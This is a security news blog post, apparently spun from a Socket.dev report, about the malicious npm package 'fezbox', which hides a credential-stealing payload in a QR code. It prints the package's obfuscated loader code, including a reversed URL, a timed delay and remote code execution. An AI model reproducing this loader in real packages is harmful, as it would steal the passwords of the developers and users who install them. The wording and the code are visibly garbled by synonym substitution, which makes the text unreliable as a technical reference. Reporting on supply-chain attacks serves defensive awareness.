Skip to content
  • Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form
New Malware in npm Package Steals Browser Passwords Using Steganographic QR Code

New Malware in npm Package Steals Browser Passwords Using Steganographic QR Code

Posted on September 23, 2025September 24, 2025 By CWS

A complicated malware marketing campaign has emerged within the npm ecosystem, using an progressive steganographic approach to hide malicious code inside QR codes.

The malicious package deal, recognized as “fezbox,” presents itself as a respectable JavaScript/TypeScript utility library whereas secretly executing password-stealing operations via a cleverly disguised QR code payload.

This assault represents a major evolution in provide chain threats, demonstrating how cybercriminals are adopting more and more inventive strategies to bypass safety measures and evade detection programs.

The fezbox package deal masquerades as a complete utility library providing TypeScript assist, efficiency optimization, and modular performance.

Based on its documentation, the package deal offers widespread helper capabilities organized by function modules, permitting builders to import solely mandatory elements.

Whereas the README file mentions a QR Code Module for producing and parsing QR codes, it intentionally omits essential particulars in regards to the package deal’s functionality to fetch QR codes from distant URLs and execute embedded malicious code.

Picture of the QR code (Supply – Socket.dev)

Socket.dev analysts recognized the malware after detecting suspicious behavioral patterns inside the package deal’s codebase.

The safety crew found a number of layers of obfuscation strategies, together with string reversal, code minification, and the novel use of steganographic QR codes to cover the ultimate payload.

On the time of discovery, the malicious package deal remained energetic on the npm registry, prompting Socket.dev to petition the npm safety crew for its quick removing and the suspension of the menace actor’s account.

Superior Steganographic Payload Supply

The malware employs a classy multi-stage execution course of that begins with environmental checks and timing delays to evade sandbox detection.

The preliminary malicious code accommodates browser-specific conditionals that confirm the presence of window and doc objects, making certain execution solely happens in respectable browser environments.

When circumstances are met, the malware waits 120 seconds earlier than initiating the payload retrieval course of.

The core malicious performance revolves round a reversed URL string that conceals the placement of the steganographic QR code:-

(operate () {
if (n.isDevelopment() || c.probability(2 / 3))
return;
setTimeout(async () => {
const loader = new d.QRCodeScriptLoader();
const t = await loader.parseQRCodeFromUrl(
“gpj.np6f7h_ffe7cdb1b812207f70f027671c18c25b/6177675571v/daolpu/egami/qsqbneuhd/moc.yrani”
.break up(“”)
.reverse()
.be a part of(“”)
);
loader.executeCode(t);
}, 120 * 1e3);
})();

When reversed, this string resolves to a Cloudinary-hosted QR code picture containing the ultimate malicious payload. The QR code itself serves as a steganographic container, hiding JavaScript code that extracts username and password values from browser cookies.

As soon as decoded, the payload makes an attempt to find cookies containing authentication credentials, particularly looking for “username” and “password” fields utilizing further string obfuscation strategies.

The extracted credentials are then exfiltrated via an HTTPS POST request to a command-and-control server hosted on Railway, a cloud platform service.

This multi-layered method – combining environmental evasion, timing delays, string reversal, steganographic concealment, and credential extraction – represents a classy evolution in npm-based provide chain assaults that safety groups should put together to defend towards.

Observe us on Google Information, LinkedIn, and X to Get Extra Instantaneous Updates, Set CSN as a Most popular Supply in Google.

Cyber Security News Tags:Browser, Code, Malware, NPM, Package, Passwords, Steals, Steganographic

Post navigation

Previous Post: Zloader Malware Repurposed to Act as Entry Point Into Corporate Environments to Deploy Ransomware
Next Post: Threat Actors Breaking to Enterprise Infrastructure Within 18 Minutes From Initial Access

Related Posts

Integrating Threat Intelligence into Security Operations Centers Integrating Threat Intelligence into Security Operations Centers Cyber Security News
Microsoft Teams Meeting Access Issues After Edge Update Microsoft Teams Meeting Access Issues After Edge Update Cyber Security News
New Kali Tool llm-tools-nmap Uses Nmap For Network Scanning Capabilities New Kali Tool llm-tools-nmap Uses Nmap For Network Scanning Capabilities Cyber Security News
Salty2FA and Tycoon2FA Phishing Kits Attacking Enterprise Users to Steal Login Credentials Salty2FA and Tycoon2FA Phishing Kits Attacking Enterprise Users to Steal Login Credentials Cyber Security News
Microsoft’s April 2026 Update Boosts RDP Security Microsoft’s April 2026 Update Boosts RDP Security Cyber Security News
Microsoft to Restrict Windows 11 Auto Installs Due to RCE Flaw Microsoft to Restrict Windows 11 Auto Installs Due to RCE Flaw Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • Mythos Excels in Vulnerability Detection, Faces Varied Challenges
  • OpenAI Faces Lawsuit Over ChatGPT Data Sharing Practices
  • Revolutionizing Data Center Security with DPUs
  • Ghostwriter Intensifies Phishing Attacks on Ukraine
  • AI Enhances Security with Realistic Attack Simulations

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • May 2026
  • April 2026
  • March 2026
  • February 2026
  • January 2026
  • December 2025
  • November 2025
  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • Mythos Excels in Vulnerability Detection, Faces Varied Challenges
  • OpenAI Faces Lawsuit Over ChatGPT Data Sharing Practices
  • Revolutionizing Data Center Security with DPUs
  • Ghostwriter Intensifies Phishing Attacks on Ukraine
  • AI Enhances Security with Realistic Attack Simulations

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Copyright © 2026 Cyber Web Spider Blog – News.

Powered by PressBook Masonry Dark